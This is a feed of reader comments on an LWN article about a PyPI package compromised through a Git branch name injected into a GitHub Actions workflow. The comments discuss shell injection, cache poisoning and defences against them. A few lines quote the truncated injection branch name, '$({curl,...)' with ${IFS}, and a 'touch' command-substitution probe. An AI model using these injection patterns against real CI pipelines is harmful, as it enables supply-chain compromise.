LWN: Comments on "Abusing Git branch names to compromise a PyPI package" https://lwn.net/Articles/1001215/ This is a special feed containing comments posted to the individual LWN article titled "Abusing Git branch names to compromise a PyPI package". en-us Mon, 03 Nov 2025 22:19:38 +0000 Mon, 03 Nov 2025 22:19:38 +0000 https://www.rssboard.org/rss-specification lwn@lwn.net Microsoft had a good idea https://lwn.net/Articles/1001823/ https://lwn.net/Articles/1001823/ mgedmin <div class="FormattedComment"> <span class="QuotedText">&gt; Now I'm wondering if any of the desktop oriented Linux distros considered making this change, with a compat symlink for /home.</span><br> <p> GoboLinux, which I've never tried personally. I don't think it has any compatibility symlinks, just a directory tree with /Programs, /Users, etc.<br> </div> Thu, 12 Dec 2024 09:47:47 +0000 Microsoft had a good idea https://lwn.net/Articles/1001764/ https://lwn.net/Articles/1001764/ jezuch <div class="FormattedComment"> So.... Windows fixed this and then they pulled the Unix stuff and had to accommodate all the broken stuff in it?<br> <p> Oh the irony!<br> </div> Wed, 11 Dec 2024 16:59:15 +0000 Microsoft had a good idea https://lwn.net/Articles/1001554/ https://lwn.net/Articles/1001554/ Wol <div class="FormattedComment"> Made even worse because on Pr1mos dot-extensions were a (new) convention at the time, while on Windows they are (almost) mandatory.<br> <p> So with most of the * files being extensionless, the globbing really went mad (I think it actually went recursive!), and until we realised and put a bug in against the backup software, it caused us quite a bit of grief. Telling "our" software not to use *'s was not an option ...<br> <p> Cheers,<br> Wol<br> </div> Tue, 10 Dec 2024 12:40:04 +0000 Microsoft had a good idea https://lwn.net/Articles/1001550/ https://lwn.net/Articles/1001550/ taladar <div class="FormattedComment"> That must have been particularly bad on Windows since Windows programs implement globbing themselves instead of letting a shell do it.<br> </div> Tue, 10 Dec 2024 11:22:11 +0000 The sad thing here is, Git's got a builtin check-ref-format command that rejects this on sight. https://lwn.net/Articles/1001543/ https://lwn.net/Articles/1001543/ jthill I see you're correct. Yow. That's painful. I've probably made this mistake myself then. <p> Unless I'm still blindspotting, <code>$branchname</code> expanded, quoted or not, still won't be expanded again unless rescanned, like the expansion being passed to bash -c or something instead of the var being passed in the environment for the invoked bash to expand just the once itself. Tue, 10 Dec 2024 09:24:59 +0000 Microsoft had a good idea https://lwn.net/Articles/1001539/ https://lwn.net/Articles/1001539/ Wol <div class="FormattedComment"> We had a system that used "*" as a matter of course in (Windows) file names. It was originally from a completely different OS (Pr1mos, of course, which used @ and = as wildcards), so they just ported it and didn't think about the implications ...<br> <p> The number of programs (backup especially) that tried to glob the filename and then broke spectacularly ...<br> <p> Cheers,<br> Wol<br> </div> Tue, 10 Dec 2024 08:12:16 +0000 The sad thing here is, Git's got a builtin check-ref-format command that rejects this on sight. https://lwn.net/Articles/1001535/ https://lwn.net/Articles/1001535/ excors <div class="FormattedComment"> I think that's not correct. The only part of &lt;that mess&gt; check-ref-format objects to is the ":", but that's not actually part of the branch name. The GitHub pull request is displaying "repositoryname:branchname", and the branch name passed into ${{github.ref}} will be "refs/heads/$({curl,...)" which check-ref-format accepts.<br> <p> (check-ref-format does reject spaces, which is presumably why the branch name uses ${IFS} instead. It also rejects ASCII control characters, '~', '^', '?', '*', '[', '..', '//', '@{', '\', etc, and says "These rules make it easy for shell script based tools to parse reference names, pathname expansion by the shell when a reference name is used unquoted (by mistake), and also avoid ambiguities in certain reference name expressions" [I think it meant to say "*avoid* pathname expansion"?]. But if it's meant to be safe when mistakenly used unquoted, why does it still allow '$'?)<br> </div> Tue, 10 Dec 2024 07:54:54 +0000 The sad thing here is, Git's got a builtin check-ref-format command that rejects this on sight. https://lwn.net/Articles/1001532/ https://lwn.net/Articles/1001532/ jthill <code><pre> branchname='&lt;that mess&gt;' git check-ref-format refs/heads/"$branchname" || die no that does not look good </pre></code> Tue, 10 Dec 2024 01:19:49 +0000 Microsoft had a good idea https://lwn.net/Articles/1001527/ https://lwn.net/Articles/1001527/ bearstech <div class="FormattedComment"> I once used "&amp;" in a folder name. It broke so many things, it was scary, I gave up with the name.<br> </div> Mon, 09 Dec 2024 21:47:29 +0000 Microsoft had a good idea https://lwn.net/Articles/1001503/ https://lwn.net/Articles/1001503/ Cyberax <div class="FormattedComment"> <span class="QuotedText">&gt; neither have a problem with longer filenames with spaces.</span><br> <p> Try setting your $HOME to a path with spaces, and watch the errors roll in as all kinds of scripts start breaking. GUI utils typically work fine, but anything with the shell scripts just cracks.<br> </div> Mon, 09 Dec 2024 18:33:38 +0000 Microsoft had a good idea https://lwn.net/Articles/1001493/ https://lwn.net/Articles/1001493/ raven667 <div class="FormattedComment"> This is the likely technical reason, but it's also nice to bring the structure into alignment with MacOSX and use a friendly to read name with capitalization, making the one small detail of where user-managed files are platform agnostic `/Users/$username/Documents` everywhere. Now I'm wondering if any of the desktop oriented Linux distros considered making this change, with a compat symlink for /home.<br> </div> Mon, 09 Dec 2024 16:54:38 +0000 How to fix the whole category of shell injection https://lwn.net/Articles/1001370/ https://lwn.net/Articles/1001370/ farnz Taint is well-defined, and doesn't mean "unsafe to use"; it means that the data came from an untrusted source, and has not yet been either validated for safety, or parsed into a trusted format. <p>The idea is that you have a "taint removal" layer that carefully handles potentially dangerous data, and converts it to a safe form or an error; most of your code doesn't go near the dangerous data, and the code that does can be carefully audited for correctness. Then, any injection bugs must either be in the "taint removal" layer, or in the layer that turns "safe" internal data into external data. <p>And note that this is a natural pattern in languages with strict type systems; you have parsers that takes input and turns it into internal structures, then you do your work on the internal structures, and you convert again from internal to external structures as you interact with other programs. Mon, 09 Dec 2024 11:15:47 +0000 How to fix the whole category of shell injection https://lwn.net/Articles/1001369/ https://lwn.net/Articles/1001369/ taladar <div class="FormattedComment"> As far as I recall Ruby had that originally too, not sure if it is still around.<br> <p> The main problem I see with a general taint flag on input is that tainted data is really not well defined. Data could be e.g. perfectly fine for use in a shell script but cause an injection in SQL or HTML.<br> </div> Mon, 09 Dec 2024 10:46:42 +0000 Bash Replacement - Rust Scripts https://lwn.net/Articles/1001368/ https://lwn.net/Articles/1001368/ taladar <div class="FormattedComment"> Terseness has advantages in interactive use but in scripts it really isn't necessary, especially if you are just talking about the same amount of tokens spread over more lines.<br> </div> Mon, 09 Dec 2024 10:44:54 +0000 Microsoft had a good idea https://lwn.net/Articles/1001367/ https://lwn.net/Articles/1001367/ leromarinvit <div class="FormattedComment"> Can't be the reason. They renamed it in Vista IIRC (certainly no later than Windows 7), long before WSL.<br> </div> Mon, 09 Dec 2024 10:26:12 +0000 Microsoft had a good idea https://lwn.net/Articles/1001366/ https://lwn.net/Articles/1001366/ excors <div class="FormattedComment"> It changed in Vista, when many APIs were limited to a MAX_PATH of 260 bytes. I can't find any official explanations but there are plausible claims that the renaming from "C:\Documents and Settings\foo\Application Data\..." to "C:\Users\foo\AppData\..." was specifically to shorten paths and allow applications to have more deeply nested folder structures.<br> </div> Mon, 09 Dec 2024 10:24:44 +0000 Microsoft had a good idea https://lwn.net/Articles/1001361/ https://lwn.net/Articles/1001361/ zdzichu <div class="FormattedComment"> Could you expand a little? WSL is a Linux API implementation (1) or Linux itself (2), neither have a problem with longer filenames with spaces.<br> </div> Mon, 09 Dec 2024 09:06:20 +0000 Microsoft had a good idea https://lwn.net/Articles/1001359/ https://lwn.net/Articles/1001359/ Cyberax <div class="FormattedComment"> WSL (10 characters)<br> </div> Mon, 09 Dec 2024 08:00:30 +0000 Microsoft had a good idea https://lwn.net/Articles/1001358/ https://lwn.net/Articles/1001358/ lkundrak <div class="FormattedComment"> I think they renamed it to "C:\Users" in more recent versions, and "Documents and Settings" is merely a symlink/junction (or the other way around?). Wondering why.<br> </div> Mon, 09 Dec 2024 06:09:13 +0000 Usernames https://lwn.net/Articles/1001355/ https://lwn.net/Articles/1001355/ randomguy3 <div class="FormattedComment"> To be clear: the builds broke because in this situation, pip doesn't attempt to fix the cache, but instead errors out (which isn't an unreasonable action from a security standpoint).<br> </div> Sun, 08 Dec 2024 23:33:33 +0000 Usernames https://lwn.net/Articles/1001354/ https://lwn.net/Articles/1001354/ randomguy3 <div class="FormattedComment"> If pip is looking in the cache to satisfy a request for a wheel it would otherwise have downloaded, it will indeed verify that the hash of the local wheel matches the server-reported hash of the file it would have downloaded.<br> <p> I've occasionally run into this when some badly-behaved project overwrote a wheel (on a company-internal server) and all the builds that had existing caches broke!<br> </div> Sun, 08 Dec 2024 23:31:30 +0000 Usernames https://lwn.net/Articles/1001353/ https://lwn.net/Articles/1001353/ meejah <div class="FormattedComment"> pip can be told to verify the hashes of the wheels it downloads. This isn't necessarily "hard" per se, but is an extra step so many projects don't bother shipping such hash requirements.<br> <p> That is, an end-user application can ship a "requirements.txt" file that contains hashes for all possible wheels for all exact versions of every requirement, and then pass `--require-hashes`. One problem is that it's "all possible wheels at some point in time" and authors may upload previously-non-existent wheels later.<br> <p> I don't believe there's any way to declare your dependencies with hashes (e.g. a Python library or application can say "I depend on foo == 1.2.3" but cannot specify the hashes -- and yes, there are usually many because wheels are architecture / platform specific).<br> </div> Sun, 08 Dec 2024 22:51:37 +0000 Microsoft had a good idea https://lwn.net/Articles/1001352/ https://lwn.net/Articles/1001352/ eru <div class="FormattedComment"> Windows has its own super-weird filename restrictions. You cannot use a device name as a pathname component, and this even includes names with a dot and a suffix. Sometimes trips you up when copying files from other operating systems, where something like "aux.c" is a perfectly reasonable name.<br> </div> Sun, 08 Dec 2024 19:52:16 +0000 Usernames https://lwn.net/Articles/1001342/ https://lwn.net/Articles/1001342/ mathstuf <div class="FormattedComment"> Hopefully clarifications (and any relevant improvements) can come from trailofbits and others working on the PyPI security story.<br> </div> Sun, 08 Dec 2024 14:02:17 +0000 Microsoft had a good idea https://lwn.net/Articles/1001339/ https://lwn.net/Articles/1001339/ cbcbcb <div class="FormattedComment"> You can... you just need a couple of nested directories to do it :)<br> <p> </div> Sun, 08 Dec 2024 13:33:26 +0000 Microsoft had a good idea https://lwn.net/Articles/1001338/ https://lwn.net/Articles/1001338/ mb <div class="FormattedComment"> I get the idea and I generally agree. But file names can't have / or NUL in them. :)<br> <p> </div> Sun, 08 Dec 2024 13:14:05 +0000 Microsoft had a good idea https://lwn.net/Articles/1001337/ https://lwn.net/Articles/1001337/ cbcbcb <div class="FormattedComment"> Microsoft had a good idea when they invented the "C:\Documents and Settings" directory. It meant that all Windows software routinely encountered filenames with spaces, and it had to be fixed.<br> <p> It would be rather inconvenient to rename “/home“ as “/home$(touch /tmp/security_bug)“, but I bet you'd still find a lot of broken filename handling if you did<br> <p> </div> Sun, 08 Dec 2024 12:48:47 +0000 Usernames https://lwn.net/Articles/1001336/ https://lwn.net/Articles/1001336/ excors <div class="FormattedComment"> <span class="QuotedText">&gt; Is `pip` missing hash verification somewhere?</span><br> <p> This is getting far beyond my ability to research it with even a little bit of confidence, so you definitely shouldn't trust what I'm saying. But I get the impression that the GitHub Actions pip cache works by caching ~/.cache/pip, which includes both downloaded files and locally-built wheels (to save the cost of rebuilding packages before installing). There's no way to verify the integrity of those wheels, so an attacker tampering with them will cause trouble.<br> <p> (The download cache may not be very secure either: "By default, pip does not perform any checks to protect against remote tampering and involves running arbitrary code from distributions" (<a href="https://pip.pypa.io/en/stable/topics/secure-installs/">https://pip.pypa.io/en/stable/topics/secure-installs/</a>). It checks the (optional) hashes provided by index servers as "a protection against download corruption", not for security. You can improve that by specifying hashes in the local requirements.txt, though I don't know if verification happens before or after the cache.)<br> </div> Sun, 08 Dec 2024 10:25:01 +0000 Cache poisoning in CI https://lwn.net/Articles/1001332/ https://lwn.net/Articles/1001332/ mathstuf <div class="FormattedComment"> Even with the cache, we still update the index on every pipeline, so one would need to intercept that. I suppose one could put bad things into the cache with a dedicated MR, but I'm not sure how one would make `master` use it blindly as it is set up to still ask `crates.io`. I suppose it hinges on whether already-downloaded things are actually re-verified or not when using them. Something to test…<br> <p> <span class="QuotedText">&gt; If you also cache the current working directory, which is a reasonable thing to want to do to speed up build times in a project with a bunch of third-party dependencies, then I believe cache poisoning is pretty easy.</span><br> <p> Yeah, that seems a lot easier to target. For compilation, we use `sccache`. Not only does this get us cache hits across crates, but it also means we're not limited to storing only "the last version built" in the cache.<br> </div> Sun, 08 Dec 2024 07:35:31 +0000 Cache poisoning in CI https://lwn.net/Articles/1001328/ https://lwn.net/Articles/1001328/ geofft <div class="FormattedComment"> cargo, I believe, caches source code globally (user-wide) and build artifacts per project, including build artifacts for dependencies. Source code has checksums that are attested by the registry, but build artifacts are likely going to change per environment, so I believe they do not get any hash checking. If you preserve ~/.cargo alone then cache poisoning is probably difficult (though I bet there are attacks based on poisoning things like ~/.cargo/config.toml that are strictly speaking not part of the cache). If you also cache the current working directory, which is a reasonable thing to want to do to speed up build times in a project with a bunch of third-party dependencies, then I believe cache poisoning is pretty easy.<br> <p> pip, on the other hand, caches build artifacts globally (user-wide), in the sense that an upstream project that only provides source code gets built into binary form (a wheel) locally by itself, and then that wheel is installed into whichever environment you're running pip on. As with the cargo situation, there's nothing to chain hash verification to for a locally-built binary artifact. But because the binary artifacts are shared, cache poisoning is indeed easy.<br> <p> I can't think of a way to solve either of these robustly - any place that you store the hash of the output is going to be as vulnerable as the output itself, no? I think the only thing you can do is to make the cache read-only when doing builds of attacker-controlled code, and only write to the cache on CI runs triggered post merge (or if the PR author is trusted). This appears to be less than straightforward with github.com/actions/cache, and I'm very much not sure if that really makes the cache read-only or if it only skips an intentional write, such that a sufficiently clever attacker-controlled script can talk to the cache API itself and do a write with the same credentials used to read the cache.<br> <p> (Also, the pip ecosystem includes the option to get binaries from the registry, and it is standard practice to provide and to use these binaries - this makes sense because Python users are generally not expected to have a working C toolchain since they're writing an interpreted language, but Rust is a compiler itself and needs at least a linker and the libc development library/headers from a C toolchain, so Python users benefit much more than Rust users from precompiled libraries. I don't know off hand if pip is good at verifying the hash of a wheel in the cache that is attested in the registry, or if it doesn't distinguish such wheels from locally-built wheels.)<br> </div> Sun, 08 Dec 2024 04:17:00 +0000 Usernames https://lwn.net/Articles/1001327/ https://lwn.net/Articles/1001327/ geofft <div class="FormattedComment"> Oh, yeah, the rules proposed on that web page, at the very bottom, sound along the lines of what I was thinking - they do permit accented or non-Latin letters (which aren't currently allowed for usernames) and mandate UTF-8 encoding for those, but they forbid punctuation that is meaningful to the shell.<br> </div> Sun, 08 Dec 2024 03:51:11 +0000 Bash Replacement - Rust Scripts https://lwn.net/Articles/1001318/ https://lwn.net/Articles/1001318/ jengelh <div class="FormattedComment"> There many languages which had ambitions to replace shell scripts as a "safer" alternative. But every now and then there are features of sh that, when written in the new language, amount to more code than before.<br> <p> while read x y z; do foo "$x" | bar "$y" | baz "$z"; done &lt;file<br> <p> Now do that in Perl, Python, Lua, anything (or Rust if you insist). Whenever you need more than three lines, sh syntax "wins", as users like the terse-ness.<br> </div> Sat, 07 Dec 2024 23:21:03 +0000 Usernames https://lwn.net/Articles/1001317/ https://lwn.net/Articles/1001317/ mathstuf <div class="FormattedComment"> Thanks, I had missed that link. Yes, the cache poisoning movement is interesting… Probably more cloud-resident relevant (we have our own fleet of runners for our GitLab instance for $VARIOUS_REASONS). I know we use fleet-wide caching for Linux compilations and host-wide compiler caching for macOS and Windows. I see a few projects using caches for `cargo`, but I *believe* that `cargo` will hash verify before actually using anything from it. Is `pip` missing hash verification somewhere? Maybe we need the payload to know?<br> <p> <span class="QuotedText">&gt; (I think that workflow is just a bot that auto-formats and adds slightly patronising LLM-generated comments to pull requests.)</span><br> <p> Ugh. "Fix formatting" commits are pretty much the epitome of useless commit noise. Useless diff, useless commit message. I've gone over that in comments here previously; I'll avoid rehashing it again.<br> <p> <span class="QuotedText">&gt; it looks like GitHub has created a large number of footguns and made it very tricky to use GitHub Actions securely, so I'm not sure how much I can blame their users for getting it wrong.</span><br> <p> Yes…I've mostly done GitLab-CI, but every time I visit GHA I am rebuffed by its (to me) unnecessary complexity.<br> </div> Sat, 07 Dec 2024 21:05:53 +0000 Additional malware versions released https://lwn.net/Articles/1001315/ https://lwn.net/Articles/1001315/ ewen <div class="FormattedComment"> It appears two further malware infected package versions were released in the last 24 hours:<br> <p> <a href="https://github.com/ultralytics/ultralytics/issues/18027#issuecomment-2525197488">https://github.com/ultralytics/ultralytics/issues/18027#i...</a><br> <p> And the current theory is those were uploaded directly to PyPI, presumably using stolen credentials (eg a PAT — personal access token), since there doesn’t seem to be a matching GitHub CI run.<br> <p> See also the summary from the repo owner:<br> <p> <a href="https://github.com/ultralytics/ultralytics/pull/18018#issuecomment-2525179403">https://github.com/ultralytics/ultralytics/pull/18018#iss...</a><br> <p> But also note some of the details are disputed by one of the security researchers who looked into it in detail yesterday (and did a large write up linked by others earlier):<br> <p> <a href="https://github.com/ultralytics/ultralytics/issues/18027#issuecomment-2525287603">https://github.com/ultralytics/ultralytics/issues/18027#i...</a><br> <p> So it appears there’ll need to be more cleanup from the attacker having got in via string interpolation issues :-/ And meanwhile a bunch of packages depending on the impacted package have locked the version to the last release before the malware infected versions and/or suggested their users check for and remove the affected versions.<br> <p> I guess we should be glad it’s “just” a crypto miner this time (which is fairly noisy / obvious due to the CPU usage).<br> <p> Ewen<br> </div> Sat, 07 Dec 2024 20:26:25 +0000 How to fix the whole catagory of shell injection https://lwn.net/Articles/1001313/ https://lwn.net/Articles/1001313/ raven667 <div class="FormattedComment"> I think that is where my half-formed thought was going, in this specific case the commands could just be an array of yaml strings and the ci could parse into an argv before applying template variable replacement. That wouldn't work when you have some if/then logic but a shell-like dsl with a very restricted feature set could make transition easier, or just building expression evaluation into the yaml along with your template engine, similar to how Ansible has Python/Jinja `when:` expressions, there is some customization/integration to be sure but they didn't have to invent a whole custom system, and experience with the library transfers between different tools in the same ecosystem. <br> <p> I'm just frustrated at seeing this same kind of problem again <br> </div> Sat, 07 Dec 2024 20:15:39 +0000 Usernames https://lwn.net/Articles/1001309/ https://lwn.net/Articles/1001309/ excors <div class="FormattedComment"> <span class="QuotedText">&gt; I think the core issue is that PR pipelines had access to secrets to publish at all</span><br> <p> According to <a href="https://blog.yossarian.net/2024/12/06/zizmor-ultralytics-injection">https://blog.yossarian.net/2024/12/06/zizmor-ultralytics-...</a> (previously linked by nickodell), the exploited workflow didn't have permissions to publish directly, but the exploit probably used cache poisoning as a method of privilege escalation. (I think that workflow is just a bot that auto-formats and adds slightly patronising LLM-generated comments to pull requests.)<br> <p> As detailed in <a href="https://adnanthekhan.com/2024/05/06/the-monsters-in-your-build-cache-github-actions-cache-poisoning/">https://adnanthekhan.com/2024/05/06/the-monsters-in-your-...</a> , GitHub Actions has (optional) caching support for the inputs and outputs of workflows. The cache server uses branches as the security boundary: cache entries written by a workflow in a given branch can only be read by workflows in the same branch or a descendant (pull requests, forked projects, etc). In this case, the exploited workflow is configured as pull_request_target which is triggered by a pull request but executes in the project's main branch (unlike pull_request which executes in the pull request's branch, I think). That means it can write arbitrary data into the main branch's cache, and any other workflows running in the main branch with caching enabled will read from that poisoned cache.<br> <p> That includes the workflow that signs and publishes artifacts to PyPI, which uses a pip cache for the standard dependencies of the publish scripts. The attacker can insert their own files into the pip cache, allowing arbitrary code execution in the publish workflow.<br> <p> The cache poisoning article recommends "Never run untrusted code within the context of the main branch if any other workflows use GitHub Actions caching", and the zizmor article says pull_request_target is "a fundamentally dangerous workflow trigger". GitHub's documentation doesn't go that far, but does mention cache poisoning and other dangers with pull_request_target (<a href="https://docs.github.com/en/actions/writing-workflows/choosing-when-your-workflow-runs/events-that-trigger-workflows#pull_request_target">https://docs.github.com/en/actions/writing-workflows/choo...</a>).<br> <p> It looks like Ultralytics violated multiple security best practices here - but on the other hand, it looks like GitHub has created a large number of footguns and made it very tricky to use GitHub Actions securely, so I'm not sure how much I can blame their users for getting it wrong.<br> </div> Sat, 07 Dec 2024 16:39:05 +0000 How to fix the whole catagory of shell injection https://lwn.net/Articles/1001310/ https://lwn.net/Articles/1001310/ eru <div class="FormattedComment"> Perl has this concept of tainted data, which perhaps would help.<br> </div> Sat, 07 Dec 2024 16:35:02 +0000 Bash Replacement - Rust Scripts https://lwn.net/Articles/1001307/ https://lwn.net/Articles/1001307/ smcv <div class="FormattedComment"> If you can inject arbitrary code into a template that is subsequently run as a script (as in this particular vulnerability), it doesn't really matter whether it's arbitrary shell execution, arbitrary Rust execution, or any other language like Python or Lua - arbitrary code is arbitrary code.<br> <p> Shell script makes it very hard to avoid *other* vulnerabilities, but *this* vulnerability wasn't a shell problem.<br> </div> Sat, 07 Dec 2024 15:36:53 +0000 Usernames https://lwn.net/Articles/1001305/ https://lwn.net/Articles/1001305/ mathstuf <div class="FormattedComment"> Maybe. I think the core issue is that PR pipelines had access to secrets to publish at all, not just "someone could do some crazy thing to make a workflow do something unexpected". I am not really sure how GHA secrets work, but GitLab is really simple in that I can lock secrets to:<br> <p> - protected branches<br> - jobs with a specific "environment" tag attached to them<br> <p> I think there is absolutely no reason that PR CI pipelines/workflows should have any access to *any* secrets regardless of whether they can be coaxed into doing unintended things or not.<br> </div> Sat, 07 Dec 2024 15:26:44 +0000 Usernames https://lwn.net/Articles/1001303/ https://lwn.net/Articles/1001303/ quotemstr <div class="FormattedComment"> Sure. I'd actually want to apply David Wheeler's entire sanitization program; <a href="https://dwheeler.com/essays/fixing-unix-linux-filenames.html">https://dwheeler.com/essays/fixing-unix-linux-filenames.html</a><br> <p> Banning literal terminal control codes in usernames would merely be a good start <br> </div> Sat, 07 Dec 2024 14:54:50 +0000